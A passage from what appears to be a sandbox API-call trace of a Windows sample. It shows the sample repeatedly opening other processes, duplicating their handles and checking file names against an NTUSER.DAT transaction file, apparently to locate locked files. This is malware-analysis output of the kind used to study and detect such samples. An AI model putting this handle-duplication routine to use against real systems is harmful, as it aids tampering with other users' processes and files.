lpExitCode=0x32ee30) returned 1 [0166.237] CloseHandle (hObject=0x1e4) returned 1 [0166.237] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.237] CloseHandle (hObject=0x194) returned 1 [0166.237] CloseHandle (hObject=0x1e8) returned 1 [0166.237] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.237] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.237] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.239] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.240] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.240] CloseHandle (hObject=0x1e4) returned 1 [0166.240] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.240] CloseHandle (hObject=0x194) returned 1 [0166.240] CloseHandle (hObject=0x1e8) returned 1 [0166.240] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.240] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.241] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.242] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.242] CloseHandle (hObject=0x1e4) returned 1 [0166.242] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.242] CloseHandle (hObject=0x194) returned 1 [0166.242] CloseHandle (hObject=0x1e8) returned 1 [0166.242] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.242] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.246] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.246] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.247] CloseHandle (hObject=0x1e4) returned 1 [0166.247] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.247] CloseHandle (hObject=0x194) returned 1 [0166.247] CloseHandle (hObject=0x1e8) returned 1 [0166.247] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.247] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.248] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.248] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.248] CloseHandle (hObject=0x1e4) returned 1 [0166.248] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0166.249] CloseHandle (hObject=0x194) returned 1 [0166.249] CloseHandle (hObject=0x1e8) returned 1 [0166.249] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.249] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.249] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.250] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.250] CloseHandle (hObject=0x1e4) returned 1 [0166.250] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.250] CloseHandle (hObject=0x194) returned 1 [0166.251] CloseHandle (hObject=0x1e8) returned 1 [0166.251] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.251] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd40, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.251] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.252] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.252] CloseHandle (hObject=0x1e4) returned 1 [0166.252] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.252] CloseHandle (hObject=0x194) returned 1 [0166.252] CloseHandle (hObject=0x1e8) returned 1 [0166.253] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.253] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd44, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.254] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.257] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.257] CloseHandle (hObject=0x1e4) returned 1 [0166.257] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.258] CloseHandle (hObject=0x194) returned 1 [0166.258] CloseHandle (hObject=0x1e8) returned 1 [0166.258] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.258] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x121c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.258] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.259] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.259] CloseHandle (hObject=0x1e4) returned 1 [0166.260] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.260] CloseHandle (hObject=0x194) returned 1 [0166.260] CloseHandle (hObject=0x1e8) returned 1 [0166.260] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.260] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.260] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.261] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.262] CloseHandle (hObject=0x1e4) returned 1 [0166.262] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.262] CloseHandle (hObject=0x194) returned 1 [0166.262] CloseHandle (hObject=0x1e8) returned 1 [0166.262] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.262] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1234, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.262] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.263] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.264] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.264] CloseHandle (hObject=0x1e4) returned 1 [0166.264] CloseHandle (hObject=0x194) returned 1 [0166.264] CloseHandle (hObject=0x1e8) returned 1 [0166.264] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.264] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.264] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.265] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.266] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.266] CloseHandle (hObject=0x1e4) returned 1 [0166.266] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.266] CloseHandle (hObject=0x194) returned 1 [0166.266] CloseHandle (hObject=0x1e8) returned 1 [0166.266] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.266] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.266] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.267] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.267] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.268] CloseHandle (hObject=0x1e4) returned 1 [0166.268] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.268] CloseHandle (hObject=0x194) returned 1 [0166.268] CloseHandle (hObject=0x1e8) returned 1 [0166.268] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.268] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.269] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.269] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.269] CloseHandle (hObject=0x1e4) returned 1 [0166.270] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.270] CloseHandle (hObject=0x194) returned 1 [0166.270] CloseHandle (hObject=0x1e8) returned 1 [0166.270] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.270] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.270] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.271] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.271] CloseHandle (hObject=0x1e4) returned 1 [0166.271] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.271] CloseHandle (hObject=0x194) returned 1 [0166.271] CloseHandle (hObject=0x1e8) returned 1 [0166.271] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.272] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1308, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.272] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.272] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.273] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.273] CloseHandle (hObject=0x1e4) returned 1 [0166.273] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.273] CloseHandle (hObject=0x194) returned 1 [0166.273] CloseHandle (hObject=0x1e8) returned 1 [0166.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.273] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.274] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.274] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.275] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.275] CloseHandle (hObject=0x1e4) returned 1 [0166.275] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.275] CloseHandle (hObject=0x194) returned 1 [0166.276] CloseHandle (hObject=0x1e8) returned 1 [0166.276] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.276] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1324, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.276] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.276] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.277] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.277] CloseHandle (hObject=0x1e4) returned 1 [0166.277] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.277] CloseHandle (hObject=0x194) returned 1 [0166.277] CloseHandle (hObject=0x1e8) returned 1 [0166.277] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.277] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x134c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.278] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.279] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.279] CloseHandle (hObject=0x1e4) returned 1 [0166.279] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.280] CloseHandle (hObject=0x194) returned 1 [0166.280] CloseHandle (hObject=0x1e8) returned 1 [0166.280] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.280] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x137c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.280] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.281] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.281] CloseHandle (hObject=0x1e4) returned 1 [0166.281] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.281] CloseHandle (hObject=0x194) returned 1 [0166.282] CloseHandle (hObject=0x1e8) returned 1 [0166.282] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.282] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1388, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.282] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.282] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.283] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.283] CloseHandle (hObject=0x1e4) returned 1 [0166.283] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.283] CloseHandle (hObject=0x194) returned 1 [0166.283] CloseHandle (hObject=0x1e8) returned 1 [0166.283] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.283] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.284] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.285] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.285] CloseHandle (hObject=0x1e4) returned 1 [0166.285] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.285] CloseHandle (hObject=0x194) returned 1 [0166.285] CloseHandle (hObject=0x1e8) returned 1 [0166.285] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.285] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.285] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.286] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.287] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.287] CloseHandle (hObject=0x1e4) returned 1 [0166.287] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.287] CloseHandle (hObject=0x194) returned 1 [0166.287] CloseHandle (hObject=0x1e8) returned 1 [0166.287] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0166.287] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.287] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.288] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.289] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.289] CloseHandle (hObject=0x1e4) returned 1 [0166.289] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.289] CloseHandle (hObject=0x194) returned 1 [0166.289] CloseHandle (hObject=0x1e8) returned 1 [0166.289] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0166.289] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.290] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.291] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.291] CloseHandle (hObject=0x1e4) returned 1 [0166.291] CloseHandle (hObject=0x194) returned 1 [0166.291] CloseHandle (hObject=0x1e8) returned 1 [0166.291] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0166.291] 